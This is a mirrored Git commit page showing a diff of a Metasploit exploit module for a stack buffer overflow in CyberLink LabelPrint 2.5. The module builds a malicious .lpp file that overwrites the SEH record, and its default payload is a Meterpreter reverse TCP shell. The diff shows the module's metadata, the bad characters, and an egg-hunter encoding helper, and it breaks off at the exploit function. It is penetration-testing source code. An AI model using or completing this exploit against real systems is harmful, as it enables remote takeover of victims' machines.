infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix syntax, minor edits

master
Jacob Robles 2018-12-11 07:55:20 -06:00
parent 1bc024eaa7
commit 165f082160
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 8 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
View File

@ -7,16 +7,15 @@ class MetasploitModule < Msf::Exploit
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::FILEFORMAT include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "CyberLink LabelPrint 2.5 Stack Buffer Overflow", 'Name' => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
'Description' => %q{ 'Description' => %q{
This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
The vulnerability is triggered when opening a .lpp project file containing overly long string characters The vulnerability is triggered when opening a .lpp project file containing overly long string characters
via open file menu. This results in overwriting a structured exception handler record and take over the via open file menu. This results in overwriting a structured exception handler record and take over the
application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit). application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -31,6 +30,7 @@ class MetasploitModule < Msf::Exploit
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'FILENAME' => 'msf.lpp',
'EXITFUNC' => 'seh', 'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true', 'DisablePayloadHandler' => 'true',
'PAYLOAD' => 'windows/meterpreter/reverse_tcp' 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
@ -66,23 +66,16 @@ class MetasploitModule < Msf::Exploit
'Payload' => 'Payload' =>
{ {
'Space' => 15000, 'Space' => 15000,
'BadChars' => "\x00", #badchars starts from \x80 to \xff
'DisableNops' => true 'DisableNops' => true
}, },
'DisclosureDate' => 'Sep 23 2017', 'DisclosureDate' => 'Sep 23 2017',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'msf.lpp'])
])
end end
def get_payload(hunter) def get_payload(hunter)
enc = framework.encoders.create('x86/unicode_mixed') enc = framework.encoders.create('x86/unicode_mixed')
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' }) enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
hunter = enc.encode(hunter, nil, nil, platform) hunter = enc.encode(hunter, nil, nil, platform)
return hunter
end end
def exploit def exploit